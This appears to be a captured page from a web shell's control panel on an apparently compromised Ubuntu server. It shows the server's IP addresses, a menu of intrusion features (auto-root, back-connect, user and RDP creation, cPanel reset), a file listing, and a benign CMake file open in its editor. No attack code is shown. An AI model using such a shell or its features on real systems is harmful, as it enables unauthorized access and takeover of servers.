Linux ip-172-26-2-223 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
Apache
: 172.26.2.223 | : 3.142.135.247
Cant Read [ /etc/named.conf ]
8.1.13
www
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
share /
cmake-3.16 /
Modules /
Platform /
Android /
[ HOME SHELL ]
Name
Size
Permission
Action
Determine-Compiler-NDK.cmake
13.13
KB
-rw-r--r--
Determine-Compiler-Standalone....
2.85
KB
-rw-r--r--
Determine-Compiler.cmake
2.93
KB
-rw-r--r--
abi-arm64-v8a-Clang.cmake
272
B
-rw-r--r--
abi-arm64-v8a-GNU.cmake
208
B
-rw-r--r--
abi-armeabi-Clang.cmake
467
B
-rw-r--r--
abi-armeabi-GNU.cmake
398
B
-rw-r--r--
abi-armeabi-v6-Clang.cmake
450
B
-rw-r--r--
abi-armeabi-v6-GNU.cmake
383
B
-rw-r--r--
abi-armeabi-v7a-Clang.cmake
682
B
-rw-r--r--
abi-armeabi-v7a-GNU.cmake
615
B
-rw-r--r--
abi-common-Clang.cmake
162
B
-rw-r--r--
abi-common-GNU.cmake
37
B
-rw-r--r--
abi-common.cmake
1.38
KB
-rw-r--r--
abi-mips-Clang.cmake
169
B
-rw-r--r--
abi-mips-GNU.cmake
106
B
-rw-r--r--
abi-mips64-Clang.cmake
173
B
-rw-r--r--
abi-mips64-GNU.cmake
108
B
-rw-r--r--
abi-x86-Clang.cmake
150
B
-rw-r--r--
abi-x86-GNU.cmake
88
B
-rw-r--r--
abi-x86_64-Clang.cmake
155
B
-rw-r--r--
abi-x86_64-GNU.cmake
91
B
-rw-r--r--
ndk-stl-c++.cmake
1.05
KB
-rw-r--r--
ndk-stl-c++_shared.cmake
255
B
-rw-r--r--
ndk-stl-c++_static.cmake
590
B
-rw-r--r--
ndk-stl-gabi++.cmake
387
B
-rw-r--r--
ndk-stl-gabi++_shared.cmake
130
B
-rw-r--r--
ndk-stl-gabi++_static.cmake
129
B
-rw-r--r--
ndk-stl-gnustl.cmake
804
B
-rw-r--r--
ndk-stl-gnustl_shared.cmake
130
B
-rw-r--r--
ndk-stl-gnustl_static.cmake
129
B
-rw-r--r--
ndk-stl-none.cmake
68
B
-rw-r--r--
ndk-stl-stlport.cmake
391
B
-rw-r--r--
ndk-stl-stlport_shared.cmake
133
B
-rw-r--r--
ndk-stl-stlport_static.cmake
132
B
-rw-r--r--
ndk-stl-system.cmake
268
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : abi-common.cmake
string(APPEND _ANDROID_ABI_INIT_CFLAGS " -funwind-tables" " -no-canonical-prefixes" ) if(CMAKE_ANDROID_NDK AND NOT CMAKE_ANDROID_NDK_TOOLCHAIN_UNIFIED AND NOT CMAKE_ANDROID_NDK_DEPRECATED_HEADERS) string(APPEND _ANDROID_ABI_INIT_CFLAGS " -D__ANDROID_API__=${CMAKE_SYSTEM_VERSION}") endif() if(NOT DEFINED CMAKE_POSITION_INDEPENDENT_CODE AND NOT CMAKE_SYSTEM_VERSION VERSION_LESS 16) set(CMAKE_POSITION_INDEPENDENT_CODE ON) endif() cmake_policy(GET CMP0083 _CMP0083) if(_CMP0083 STREQUAL NEW) # PIE Flags are managed by compiler configuration files if(CMAKE_SYSTEM_VERSION VERSION_GREATER_EQUAL 16) # ensure PIE flags are passed to the linker set(CMAKE_C_LINK_PIE_SUPPORTED YES CACHE INTERNAL "PIE (C)") set(CMAKE_CXX_LINK_PIE_SUPPORTED YES CACHE INTERNAL "PIE (CXX)") if(CMAKE_SYSTEM_VERSION VERSION_GREATER_EQUAL 21) # no PIE executable are no longer supported set(CMAKE_C_LINK_NO_PIE_SUPPORTED NO CACHE INTERNAL "NO_PIE (C)") set(CMAKE_CXX_LINK_NO_PIE_SUPPORTED NO CACHE INTERNAL "NO_PIE (CXX)") endif() endif() else() if(CMAKE_POSITION_INDEPENDENT_CODE) string(APPEND _ANDROID_ABI_INIT_EXE_LDFLAGS " -fPIE -pie") endif() endif() unset(_CMP0083) string(APPEND _ANDROID_ABI_INIT_EXE_LDFLAGS " -Wl,--gc-sections") if(NOT _ANDROID_ABI_INIT_EXE_LDFLAGS_NO_nocopyreloc) string(APPEND _ANDROID_ABI_INIT_EXE_LDFLAGS " -Wl,-z,nocopyreloc") endif()
Close